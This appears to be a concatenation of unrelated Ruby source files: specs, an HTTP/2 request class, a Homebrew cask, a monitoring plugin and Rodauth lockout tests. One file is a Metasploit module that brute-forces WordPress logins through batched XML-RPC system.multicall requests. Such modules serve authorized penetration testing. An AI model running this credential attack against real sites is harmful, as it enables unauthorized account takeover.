it 'replaces the description with the comment above the example' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql 'This is a comment used as description.'
end
# --- apib:response
# foo
# bar
# ---
it 'handles multi line comments' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "foo\nbar"
end
# ABC
#
# --- apib:response
# foo
# bar
# ---
#
# CDE
#
it 'ignores surrounding comments' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "foo\nbar"
end
# ABC
#
# --- apib:response
# foo
# bar
#
# CDE
#
it 'works without ending string' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "foo\nbar\n\nCDE\n"
end
# --- apib:response
# ### foo
it 'is not stripping out markdown control characters' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "### foo"
end
# --- apib:response
# foobar
# ------
# hello
it 'is accepts headline underscores' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "foobar\n------\nhello"
end
# --- apib:response
# + foobar
# + hello
it 'keeps subsequent indentation' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "+ foobar\n + hello"
end
end
context 'both request and response have description' do
# --- apib:request
# Request comment
# --- apib:response
# Response comment
# ---
it 'saves request description if we have a request and response description' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
request_data = action[:request]
response_data = action[:response].first
expect(response_data[:description]).to eql 'Response comment'
expect(request_data[:description]).to eql 'Request comment'
end
# --- apib:request
# Request comment
# ---
it 'saves request description if we have only a request description' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
request_data = action[:request]
expect(request_data[:description]).to eql 'Request comment'
end
end
end
pending '#document_response'
pending '#response_exists?'
end
| 28.826255 | 95 | 0.600188 |
d519fbdca25fa4efecce31536bd8b0b83bdf4f38 | 5,347 | # frozen_string_literal: true
#
# Copyright, 2018, by Samuel G. D. Williams. <http://www.codeotaku.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
require_relative '../request'
require_relative 'stream'
module Async
module HTTP
module Protocol
module HTTP2
# Typically used on the server side to represent an incoming request, and write the response.
class Request < Protocol::Request
class Stream < HTTP2::Stream
def initialize(*)
super
@enqueued = false
@request = Request.new(self)
end
attr :request
def receive_initial_headers(headers, end_stream)
headers.each do |key, value|
if key == SCHEME
raise ::Protocol::HTTP2::HeaderError, "Request scheme already specified!" if @request.scheme
@request.scheme = value
elsif key == AUTHORITY
raise ::Protocol::HTTP2::HeaderError, "Request authority already specified!" if @request.authority
@request.authority = value
elsif key == METHOD
raise ::Protocol::HTTP2::HeaderError, "Request method already specified!" if @request.method
@request.method = value
elsif key == PATH
raise ::Protocol::HTTP2::HeaderError, "Request path is empty!" if value.empty?
raise ::Protocol::HTTP2::HeaderError, "Request path already specified!" if @request.path
@request.path = value
elsif key == PROTOCOL
raise ::Protocol::HTTP2::HeaderError, "Request protocol already specified!" if @request.protocol
@request.protocol = value
elsif key == CONTENT_LENGTH
raise ::Protocol::HTTP2::HeaderError, "Request content length already specified!" if @length
@length = Integer(value)
elsif key == CONNECTION
raise ::Protocol::HTTP2::HeaderError, "Connection header is not allowed!"
elsif key.start_with? ':'
raise ::Protocol::HTTP2::HeaderError, "Invalid pseudo-header #{key}!"
elsif key =~ /[A-Z]/
raise ::Protocol::HTTP2::HeaderError, "Invalid characters in header #{key}!"
else
add_header(key, value)
end
end
@request.headers = @headers
unless @request.valid?
raise ::Protocol::HTTP2::HeaderError, "Request is missing required headers!"
else
# We only construct the input/body if data is coming.
unless end_stream
@request.body = prepare_input(@length)
end
# We are ready for processing:
@connection.requests.enqueue(@request)
end
return headers
end
def closed(error)
@request = nil
super
end
end
def initialize(stream)
super(nil, nil, nil, nil, VERSION, nil)
@stream = stream
end
attr :stream
def connection
@stream.connection
end
def valid?
@scheme and @method and @path
end
def hijack?
false
end
NO_RESPONSE = [
[STATUS, '500'],
]
def send_response(response)
if response.nil?
return @stream.send_headers(nil, NO_RESPONSE, ::Protocol::HTTP2::END_STREAM)
end
protocol_headers = [
[STATUS, response.status],
]
if protocol = response.protocol
protocol_headers << [PROTOCOL, protocol]
end
if length = response.body&.length
protocol_headers << [CONTENT_LENGTH, length]
end
headers = ::Protocol::HTTP::Headers::Merged.new(protocol_headers, response.headers)
if body = response.body and !self.head?
# This function informs the headers object that any subsequent headers are going to be trailer. Therefore, it must be called *before* sending the headers, to avoid any race conditions.
trailer = response.headers.trailer!
@stream.send_headers(nil, headers)
@stream.send_body(body, trailer)
else
# Ensure the response body is closed if we are ending the stream:
response.close
@stream.send_headers(nil, headers, ::Protocol::HTTP2::END_STREAM)
end
end
end
end
end
end
end
| 32.210843 | 191 | 0.634935 |
e2accb7b8723cb94060de1c138fc8b3d72eaee49 | 1,323 | module VCAP::CloudController
module Diego
class Environment
EXCLUDE = [:users]
def initialize(app, initial_env={})
@app = app
@initial_env = initial_env || {}
end
def as_json(_={})
env = []
add_hash_to_env(@initial_env, env)
env << { 'name' => 'VCAP_APPLICATION', 'value' => vcap_application.to_json }
env << { 'name' => 'VCAP_SERVICES', 'value' => app.system_env_json['VCAP_SERVICES'].to_json }
env << { 'name' => 'MEMORY_LIMIT', 'value' => "#{app.memory}m" }
db_uri = app.database_uri
env << { 'name' => 'DATABASE_URL', 'value' => db_uri } if db_uri
app_env_json = app.environment_json || {}
add_hash_to_env(app_env_json, env)
env
end
private
attr_reader :app
def vcap_application
env = app.vcap_application
EXCLUDE.each { |k| env.delete(k) }
env
end
def self.hash_to_diego_env(hash)
hash.map do |k, v|
case v
when Array, Hash
v = MultiJson.dump(v)
else
v = v.to_s
end
{ 'name' => k, 'value' => v }
end
end
def add_hash_to_env(hash, env)
env.concat(self.class.hash_to_diego_env(hash))
end
end
end
end
| 23.210526 | 101 | 0.534392 |
1155906e6e919798fe9c8b672c523da340a99035 | 1,022 | cask 'expressionist' do
version :latest
sha256 :no_check
# aescripts.com was verified as official when first introduced to the cask
url 'https://aescripts.com/downloadable/download/sample/sample_id/411',
user_agent: :fake
name 'Expressionist'
homepage "http://klustre.nl/#{token}"
depends_on cask: 'exmancmd'
postflight do
zxp = Dir["#{staged_path}/expressionist*/Expressionist*.zxp"][0]
system_command "#{HOMEBREW_PREFIX}/bin/exmancmd", args: ['--install', zxp]
end
uninstall script: {
executable: "#{HOMEBREW_PREFIX}/bin/exmancmd",
args: ['--remove', 'com.aescripts.expressionist'],
}
support = '~/Library/Application Support/Aescripts'
zap trash: [
"#{support}/settings/com.aescripts.settings_Expressionist.json",
"#{support}/com.aescripts.Expressionist.lic",
],
rmdir: support
caveats "A license can be purchased at https://aescripts.com/#{token}."
end
| 31.9375 | 79 | 0.636986 |
d52bc38f9fdc66e94a4f976f82c7da6f7a1cb5ed | 1,370 | require_relative 'helper'
require 'zendesk/deployment/committish'
describe Zendesk::Deployment::Committish do
def tag(thing, tag)
sh "git checkout #{thing} 2>&1 && git tag #{tag} 2>&1 && git checkout master 2>&1"
end
def sh(command)
result = `#{command}`
raise "Failed: #{result}" unless $?.success?
result
end
def commit(thing)
Zendesk::Deployment::Committish.new(thing)
end
around do |test|
Dir.mktmpdir do |dir|
Dir.chdir(dir) do
sh "git init 2>&1 && git commit -m 'a' --allow-empty 2>&1 && git commit -m 'a' --allow-empty 2>&1"
test.call
end
end
end
it "finds tag" do
tag "HEAD^", "v1.2.3"
commit = commit("v1.2.3")
assert commit.valid_tag?
assert_equal "v1.2.3", commit.to_s
end
it "finds pre" do
tag "HEAD^", "v1.2.3.4"
commit = commit("v1.2.3.4")
assert commit.valid_tag?
assert_equal "v1.2.3.4", commit.to_s
end
it "finds pre with letters" do
tag "HEAD^", "v1.2.3.patched"
commit = commit("v1.2.3.patched")
assert commit.valid_tag?
assert_equal "v1.2.3.patched", commit.to_s
end
it "can compare tags" do
tag "HEAD^", "v1.2.3"
tag "HEAD", "v1.2.4"
assert_operator commit("v1.2.4"), :>, commit("v1.2.3")
end
it "works with non-tags" do
assert_equal 0, commit("v1.2.4") <=> commit("master")
end
end
| 23.220339 | 107 | 0.607299 |
e9bf7853b4d0733e030cb26d856d1b62e015b49a | 154 | # This file is used by Rack-based servers to start the application.
require ::File.expand_path('../config/environment', __FILE__)
run Rtld::Application
| 30.8 | 67 | 0.766234 |
e2395c0fabaa6768487364e035c05aac901f5d2d | 2,051 | # frozen_string_literal: true
ENV['HATCHET_BUILDPACK_BASE'] ||= 'https://github.com/heroku/heroku-buildpack-python.git'
ENV['HATCHET_DEFAULT_STACK'] ||= 'heroku-20'
require 'rspec/core'
require 'hatchet'
LATEST_PYTHON_2_7 = '2.7.18'
LATEST_PYTHON_3_4 = '3.4.10'
LATEST_PYTHON_3_5 = '3.5.10'
LATEST_PYTHON_3_6 = '3.6.15'
LATEST_PYTHON_3_7 = '3.7.12'
LATEST_PYTHON_3_8 = '3.8.12'
LATEST_PYTHON_3_9 = '3.9.7'
LATEST_PYTHON_3_10 = '3.10.0'
LATEST_PYPY_2_7 = '7.3.2'
LATEST_PYPY_3_6 = '7.3.2'
DEFAULT_PYTHON_VERSION = LATEST_PYTHON_3_9
# Work around the return value for `default_buildpack` changing after deploy:
# https://github.com/heroku/hatchet/issues/180
# Once we've updated to Hatchet release that includes the fix, consumers
# of this can switch back to using `app.class.default_buildpack`
DEFAULT_BUILDPACK_URL = Hatchet::App.default_buildpack
RSpec.configure do |config|
# Disables the legacy rspec globals and monkey-patched `should` syntax.
config.disable_monkey_patching!
# Enable flags like --only-failures and --next-failure.
config.example_status_persistence_file_path = '.rspec_status'
# Allows limiting a spec run to individual examples or groups by tagging them
# with `:focus` metadata via the `fit`, `fcontext` and `fdescribe` aliases.
config.filter_run_when_matching :focus
# Allows declaring on which stacks a test/group should run by tagging it with `stacks`.
config.filter_run_excluding stacks: ->(stacks) { !stacks.include?(ENV['HATCHET_DEFAULT_STACK']) }
end
def clean_output(output)
# Remove trailing whitespace characters added by Git:
# https://github.com/heroku/hatchet/issues/162
output.gsub(/ {8}(?=\R)/, '')
end
def update_buildpacks(app, buildpacks)
# Updates the list of buildpacks for an existing app, until Hatchet supports this natively:
# https://github.com/heroku/hatchet/issues/166
buildpack_list = buildpacks.map { |b| { buildpack: (b == :default ? DEFAULT_BUILDPACK_URL : b) } }
app.api_rate_limit.call.buildpack_installation.update(app.name, updates: buildpack_list)
end
| 40.215686 | 100 | 0.761092 |
4abb66098248da536f7e402d45ec0001497e7a0c | 328 | require 'stringio'
require File.expand_path('../../../spec_helper', __FILE__)
ruby_version_is "1.9.2" do
describe "StringIO#set_encoding" do
it "sets the encoding of the underlying String" do
io = StringIO.new
io.set_encoding Encoding::UTF8
io.string.encoding.should == Encoding::UTF8
end
end
end
| 25.230769 | 58 | 0.695122 |
3901c4b4cec975ff1ee80201fc2dd778e06bd308 | 717 | require "woocommerce_api/resources/legacy/meta"
module WoocommerceAPI
module V3
class Store < Resource
attribute :description
attribute :meta, Meta
attribute :name
attribute :URL
attribute :wc_version
attribute :routes, Hash
delegate :timezone,
:currency,
:currency_format,
:currency_position,
:price_num_decimals,
:thousand_separator,
:decimal_separator,
:tax_included,
:weight_unit,
:dimension_unit,
:ssl_enabled,
:permalinks_enabled,
:links,
to: :meta
end
end
end
| 24.724138 | 47 | 0.532775 |
bba4352c5afa77eced16b279c158c726c14222f8 | 2,500 |
# Copyright 2018 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
# The following example requires two environment variables to be set:
# * CRED_PATH - the path to a JSON service_account file
# * PROJECT - the name of your GCP project.
#
# For convenience you optionally can add these to your ~/.bash_profile (or the
# respective .profile settings) environment:
#
# export CRED_PATH=/path/to/my/cred.json
# export PROJECT=/path/to/my/cred.json
#
# The following command will run this example:
# CRED_PATH=/path/to/my/cred.json \
# PROJECT='my-test-project'
# chef-client -z --runlist \
# "recipe[gcompute::tests~delete_instance_template]"
#
# ________________________
raise "Missing parameter 'CRED_PATH'. Please read docs at #{__FILE__}" \
unless ENV.key?('CRED_PATH')
raise "Missing parameter 'PROJECT'. Please read docs at #{__FILE__}" \
unless ENV.key?('PROJECT')
# For more information on the gauth_credential parameters and providers please
# refer to its detailed documentation at:
# https://github.com/GoogleCloudPlatform/chef-google-auth
gauth_credential 'mycred' do
action :serviceaccount
path ENV['CRED_PATH'] # e.g. '/path/to/my_account.json'
scopes [
'https://www.googleapis.com/auth/compute'
]
end
gcompute_instance_template 'chef-e2e-instance-template-test' do
action :delete
project ENV['PROJECT'] # ex: 'my-test-project'
credential 'mycred'
end
| 36.764706 | 78 | 0.6616 |
7995575b68780f12d38dd99af6e547ac94710378 | 2,795 | #!/usr/bin/env ruby
$stdout.sync = true
# Reports the following MP statistics : user, nice, sys, iowait, irq, soft, steal, idle, intrps
#
# Compatibility
# -------------
# Requires the mpstat command, usually provided by the sysstat package.
require "rubygems"
require "bundler/setup"
require "newrelic_plugin"
#
#
# NOTE: Please add the following lines to your Gemfile:
# gem "newrelic_plugin", git: "[email protected]:newrelic-platform/newrelic_plugin.git"
#
#
# Note: You must have a config/newrelic_plugin.yml file that
# contains the following information in order to use
# this Gem:
#
# newrelic:
# # Update with your New Relic account license key:
# license_key: 'put_your_license_key_here'
# # Set to '1' for verbose output, remove for normal output.
# # All output goes to stdout/stderr.
# verbose: 1
# agents:
# mpstat:
# # The command used to display MP statistics
# command: mpstat
# # Report current usage as the average over this many seconds.
# interval: 5
module MpstatAgent
class Agent < NewRelic::Plugin::Agent::Base
agent_guid "com.railsware.mpstat"
agent_config_options :command, :interval
agent_version '0.0.2'
agent_human_labels("Mpstat") { `hostname -f` }
def poll_cycle
# Using the second reading- avg since previous check
output = stat_output
values,result = parse_values(output), {}
[:usr, :user, :nice, :sys, :iowait, :irq, :soft, :steal, :idle].each do |k|
report_metric("mpstat/#{k}", "%", values[k]) if values[k]
end
report_metric("mpstat/intrps", "instr/sec", values[:intrps]) if values[:intrps]
rescue Exception => e
raise "Couldn't parse output. Make sure you have mpstat installed. #{e}"
end
private
def stat_output()
@command = command || 'mpstat'
@interval = interval || 5
stat_command = "#{command} #{interval} 2"
`#{stat_command}`
end
def parse_values(output)
# Expected output format:
# 04:38:34 PM CPU %user %nice %sys %iowait %irq %soft %steal %idle intr/s
# 04:38:34 PM all 6.69 0.02 1.30 0.31 0.02 0.13 0.00 91.53 349.37
# take the format fields
format=output.split("\n").grep(/CPU/).last.gsub(/\//,'p').gsub(/(%|:|PM|AM)/,'').downcase.split
# take all the stat fields
raw_stats=output.split("\n").grep(/[0-9]+\.[0-9]+$/).last.split
stats={}
format.each_with_index { |field,i| stats[ format[i].to_sym ]=raw_stats[i] }
stats
end
end
NewRelic::Plugin::Setup.install_agent :mpstat, MpstatAgent
#
# Launch the agent (never returns)
#
NewRelic::Plugin::Run.setup_and_run
end
| 28.814433 | 101 | 0.619678 |
d52d6c8f69558ecb1912ac9f31d9bac238330413 | 4,626 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/wordpress_multicall'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress XML-RPC system.multicall Credential Collector',
'Description' => %q{
This module attempts to find Wordpress credentials by abusing the XMLRPC
APIs. Wordpress versions prior to 4.4.1 are suitable for this type of
technique. For newer versions, the script will drop the CHUNKSIZE to 1 automatically.
},
'Author' =>
[
'KingSabri <King.Sabri[at]gmail.com>' ,
'William <WCoppola[at]Lares.com>',
'sinn3r'
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/' ],
['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html' ]
],
'DefaultOptions' =>
{
'USER_FILE' => File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt"),
'PASS_FILE' => File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")
}
))
register_options(
[
OptInt.new('BLOCKEDWAIT', [ true, 'Time(minutes) to wait if got blocked', 6 ]),
OptInt.new('CHUNKSIZE', [ true, 'Number of passwords need to be sent per request. (1700 is the max)', 1500 ]),
], self.class)
# Not supporting these options, because we are not actually letting the API to process the
# password list for us. We are doing that in Metasploit::Framework::LoginScanner::WordpressRPC.
deregister_options(
'BLANK_PASSWORDS', 'PASSWORD', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_PASS'
)
end
def passwords
File.readlines(datastore['PASS_FILE']).lazy.map {|pass| pass.chomp}
end
def check_options
if datastore['CHUNKSIZE'] > 1700
fail_with(Failure::BadConfig, 'Option CHUNKSIZE cannot be larger than 1700')
end
end
def setup
check_options
end
def check_setup
version = wordpress_version
vprint_status("Found Wordpress version: #{version}")
if !wordpress_and_online?
print_error("#{peer}:#{rport}#{target_uri} does not appear to be running Wordpress or you got blocked! (Do Manual Check)")
false
elsif !wordpress_xmlrpc_enabled?
print_error("#{peer}:#{rport}#{wordpress_url_xmlrpc} does not enable XMLRPC")
false
elsif Gem::Version.new(version) >= Gem::Version.new('4.4.1')
print_error("#{peer}#{wordpress_url_xmlrpc} Target's version (#{version}) is not vulnerable to this attack.")
vprint_status("Dropping CHUNKSIZE from #{datastore['CHUNKSIZE']} to 1")
datastore['CHUNKSIZE'] = 1
true
else
print_status("Target #{peer} is running Wordpress")
true
end
end
def run_host(ip)
if check_setup
print_status("XMLRPC enabled, Hello message received!")
else
print_error("Abborting the attack.")
return
end
print_status("#{peer} - Starting XML-RPC login sweep...")
cred_collection = Metasploit::Framework::CredentialCollection.new(
blank_passwords: true,
user_file: datastore['USER_FILE'],
username: datastore['USERNAME']
)
scanner = Metasploit::Framework::LoginScanner::WordpressMulticall.new(
configure_http_login_scanner(
passwords: passwords,
chunk_size: datastore['CHUNKSIZE'],
block_wait: datastore['BLOCKEDWAIT'],
base_uri: target_uri.path,
uri: wordpress_url_xmlrpc,
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: 5,
)
)
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
module_fullname: self.fullname,
workspace_id: myworkspace_id
)
case result.status
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute :level => :vgood, :ip => ip, :msg => "SUCCESSFUL: #{result.credential}"
end
end
end
end
| 33.521739 | 128 | 0.659533 |
e9068968a2e2e176f102bb216e520656992dbdf3 | 233 | class Exam < ApplicationRecord
belongs_to :curriculum
validates :question, presence: true
validates :question_code, presence: true
validates :answer_code, presence: true
validates :explanation, presence: true
end
| 25.888889 | 42 | 0.755365 |
38e34108e7c467e79f2d955e15aff1bdc3501abf | 12,855 | require_relative 'spec_helper'
describe 'Rodauth lockout feature' do
it "should support account lockouts without autologin on unlock" do
lockouts = []
rodauth do
enable :lockout
max_invalid_logins 2
unlock_account_autologin? false
after_account_lockout{lockouts << true}
account_lockouts_email_last_sent_column nil
end
roda do |r|
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
login(:pass=>'012345678910')
page.find('#error_flash').text.must_equal 'There was an error logging in'
login
page.find('#notice_flash').text.must_equal 'You have been logged in'
page.body.must_include("Logged In")
remove_cookie('rack.session')
visit '/login'
fill_in 'Login', :with=>'[email protected]'
2.times do
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
end
lockouts.must_equal [true]
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
page.body.must_include("This account is currently locked out")
click_button 'Request Account Unlock'
page.find('#notice_flash').text.must_equal 'An email has been sent to you with a link to unlock your account'
link = email_link(/(\/unlock-account\?key=.+)$/)
visit '/login'
fill_in 'Login', :with=>'[email protected]'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
click_button 'Request Account Unlock'
email_link(/(\/unlock-account\?key=.+)$/).must_equal link
proc{visit '/unlock-account'}.must_raise RuntimeError
visit link[0...-1]
page.find('#error_flash').text.must_equal "There was an error unlocking your account: invalid or expired unlock account key"
visit link
click_button 'Unlock Account'
page.find('#notice_flash').text.must_equal 'Your account has been unlocked'
page.body.must_include('Not Logged')
login
page.find('#notice_flash').text.must_equal 'You have been logged in'
page.body.must_include("Logged In")
end
it "should support account lockouts with autologin and password required on unlock" do
rodauth do
enable :lockout
unlock_account_requires_password? true
end
roda do |r|
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
100.times do
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
end
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
page.body.must_include("This account is currently locked out")
click_button 'Request Account Unlock'
page.find('#notice_flash').text.must_equal 'An email has been sent to you with a link to unlock your account'
link = email_link(/(\/unlock-account\?key=.+)$/)
visit '/login'
fill_in 'Login', :with=>'[email protected]'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
click_button 'Request Account Unlock'
page.find('#error_flash').text.must_equal "An email has recently been sent to you with a link to unlock the account"
Mail::TestMailer.deliveries.must_equal []
visit link
click_button 'Unlock Account'
page.find('#error_flash').text.must_equal 'There was an error unlocking your account'
page.body.must_include('invalid password')
fill_in 'Password', :with=>'0123456789'
click_button 'Unlock Account'
page.find('#notice_flash').text.must_equal 'Your account has been unlocked'
page.body.must_include("Logged In")
end
it "should autounlock after enough time" do
rodauth do
enable :lockout
max_invalid_logins 2
end
roda do |r|
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
2.times do
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
end
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
page.body.must_include("This account is currently locked out")
DB[:account_lockouts].update(:deadline=>Date.today - 3)
login
page.find('#notice_flash').text.must_equal 'You have been logged in'
page.body.must_include("Logged In")
end
[true, false].each do |before|
it "should clear unlock token when closing account, when loading lockout #{before ? "before" : "after"}" do
rodauth do
features = [:close_account, :lockout]
features.reverse! if before
enable(*features)
max_invalid_logins 2
end
roda do |r|
r.get('b') do
session[:account_id] = DB[:accounts].get(:id)
'b'
end
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
3.times do
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
end
DB[:account_lockouts].count.must_equal 1
visit 'b'
visit '/close-account'
fill_in 'Password', :with=>'0123456789'
click_button 'Close Account'
DB[:account_lockouts].count.must_equal 0
end
end
it "should handle uniqueness errors raised when inserting unlock account token" do
lockouts = []
rodauth do
enable :lockout
max_invalid_logins 2
after_account_lockout{lockouts << true}
end
roda do |r|
def rodauth.raised_uniqueness_violation(*) super; true; end
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
lockouts.must_equal [true]
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
page.body.must_include("This account is currently locked out")
click_button 'Request Account Unlock'
page.find('#notice_flash').text.must_equal 'An email has been sent to you with a link to unlock your account'
link = email_link(/(\/unlock-account\?key=.+)$/)
visit link
click_button 'Unlock Account'
page.find('#notice_flash').text.must_equal 'Your account has been unlocked'
page.body.must_include("Logged In")
end
it "should reraise uniqueness errors raised when inserting unlock account token if no token found" do
lockouts = []
rodauth do
enable :lockout
max_invalid_logins 2
after_account_lockout{lockouts << true}
end
roda do |r|
def rodauth.raised_uniqueness_violation(*) ArgumentError.new; end
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
fill_in 'Password', :with=>'012345678910'
proc{click_button 'Login'}.must_raise ArgumentError
end
[:jwt, :json].each do |json|
it "should support account lockouts via #{json}" do
rodauth do
enable :logout, :lockout
max_invalid_logins 2
unlock_account_autologin? false
unlock_account_email_body{unlock_account_email_link}
end
roda(json) do |r|
r.rodauth
[rodauth.logged_in? ? "Logged In" : "Not Logged"]
end
res = json_request('/unlock-account-request', :login=>'[email protected]')
res.must_equal [401, {'reason'=>'no_matching_login', 'error'=>"No matching login"}]
res = json_login(:pass=>'1', :no_check=>true)
res.must_equal [401, {'reason'=>"invalid_password",'error'=>"There was an error logging in", "field-error"=>["password", "invalid password"]}]
json_login
json_logout
2.times do
res = json_login(:pass=>'1', :no_check=>true)
res.must_equal [401, {'reason'=>"invalid_password",'error'=>"There was an error logging in", "field-error"=>["password", "invalid password"]}]
end
2.times do
res = json_login(:pass=>'1', :no_check=>true)
res.must_equal [403, {'reason'=>"account_locked_out", 'error'=>"This account is currently locked out and cannot be logged in to"}]
end
res = json_request('/unlock-account')
res.must_equal [401, {'reason'=>'invalid_unlock_account_key', 'error'=>"There was an error unlocking your account: invalid or expired unlock account key"}]
res = json_request('/unlock-account-request', :login=>'[email protected]')
res.must_equal [200, {'success'=>"An email has been sent to you with a link to unlock your account"}]
link = email_link(/key=.+$/)
res = json_request('/unlock-account', :key=>link[4...-1])
res.must_equal [401, {'reason'=>'invalid_unlock_account_key', 'error'=>"There was an error unlocking your account: invalid or expired unlock account key"}]
res = json_request('/unlock-account', :key=>link[4..-1])
res.must_equal [200, {'success'=>"Your account has been unlocked"}]
res = json_request.must_equal [200, ['Not Logged']]
json_login
end
end
it "should support account locks, unlocks, and unlock requests using internal requests" do
rodauth do
enable :lockout, :logout, :internal_request
account_lockouts_email_last_sent_column nil
domain 'example.com'
end
roda do |r|
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
proc do
app.rodauth.lock_account(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account_request(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account_request(:login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account_request(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
proc do
app.rodauth.unlock_account(:account_login=>'[email protected]')
end.must_raise Rodauth::InternalRequestError
app.rodauth.lock_account(:account_login=>'[email protected]').must_be_nil
# Check idempotent
app.rodauth.lock_account(:account_login=>'[email protected]').must_be_nil
login
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
app.rodauth.unlock_account_request(:login=>'[email protected]').must_be_nil
link = email_link(/(\/unlock-account\?key=.+)$/)
